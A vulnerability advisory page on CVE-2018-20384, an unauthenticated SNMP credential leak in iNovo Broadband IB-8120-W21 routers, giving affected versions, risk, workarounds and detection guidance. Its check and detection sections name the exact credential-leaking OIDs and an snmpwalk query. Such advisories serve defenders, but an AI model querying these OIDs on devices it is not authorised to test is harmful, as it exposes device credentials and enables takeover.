CVE-2018-20384 – This vulnerability allows remote attackers to r... (How to Fix)

Q: What is the severity of CVE-2018-20384?

CVE-2018-20384 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests on affected iNovo Broadband devices. Attackers can obtain authentication credentials without authentication, potentially leading to full device compromise. Organizations using iNovo Broadband IB-8120-W21 and IB-8120-W21E1 devices with vulnerable firmware are affected.

📋 TL;DR

This vulnerability allows remote attackers to retrieve device credentials via specific SNMP OID requests on affected iNovo Broadband devices. Attackers can obtain authentication credentials without authentication, potentially leading to full device compromise. Organizations using iNovo Broadband IB-8120-W21 and IB-8120-W21E1 devices with vulnerable firmware are affected.

💻 Affected Systems

Products:

iNovo Broadband IB-8120-W21
iNovo Broadband IB-8120-W21E1

Versions: IB-8120-W21: 139.4410mp1.004200.002, IB-8120-W21E1: 139.4410mp1.3921132mp1.899.004404.004

Operating Systems: Embedded firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Devices with SNMP enabled and accessible are vulnerable. The specific OIDs expose credential information.

📦 What is this software?

Ib 8120 W21 Firmware by Inovobb

View all CVEs affecting Ib 8120 W21 Firmware →

Ib 8120 W21e1 Firmware by Inovobb

View all CVEs affecting Ib 8120 W21e1 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device takeover leading to network compromise, credential harvesting, and potential lateral movement within the network.

🟠

Likely Case

Attackers gain administrative access to affected devices, enabling configuration changes, traffic interception, and credential theft.

🟢

If Mitigated

Limited impact with proper network segmentation and SNMP access controls preventing unauthorized queries.

🌐 Internet-Facing: HIGH - Devices exposed to the internet can be directly exploited by any remote attacker.

🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could exploit this vulnerability within the network.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires only SNMP access and knowledge of the specific OIDs. Public proof-of-concept exists in referenced GitHub repository.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No vendor advisory found

Restart Required: No

Instructions:

No official patch available. Check with iNovo Broadband for firmware updates. Consider replacing devices if no fix is provided.

🔧 Temporary Workarounds

Disable SNMP Access

all

Completely disable SNMP service on affected devices if not required for operations.

Restrict SNMP Access

all

Configure SNMP access controls to limit queries to trusted IP addresses only.

Change Default Credentials

all

Change all default credentials on affected devices, though this may not fully mitigate the vulnerability.

🧯 If You Can't Patch

Isolate affected devices in separate network segments with strict firewall rules
Implement network monitoring for SNMP queries to the vulnerable OIDs
Consider replacing devices with supported alternatives if vendor provides no fix

🔍 How to Verify

Check if Vulnerable:

Use snmpwalk or similar SNMP tool to query OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0. If they return credential information, the device is vulnerable.

Check Version:

Check device web interface or console for firmware version information.

Verify Fix Applied:

After applying workarounds, verify SNMP service is disabled or restricted, and the vulnerable OIDs no longer return credential data.

📡 Detection & Monitoring

Log Indicators:

SNMP queries to OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
Multiple failed authentication attempts following SNMP queries

Network Indicators:

SNMP traffic (UDP 161) to affected devices from untrusted sources
Unusual SNMP query patterns

SIEM Query:

source_port=161 AND (oid="iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

📊 Metadata

CVE ID: CVE-2018-20384

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-522

Published: December 23, 2018

Last Updated: November 21, 2024

🔗 References

https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory
https://github.com/ezelf/sensitivesOids/blob/master/oidpassswordleaks.csv Third Party Advisory
https://misteralfa-hack.blogspot.com/2018/12/stringbleed-y-ahora-que-passwords-leaks.html Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-20384, you might also want to check these: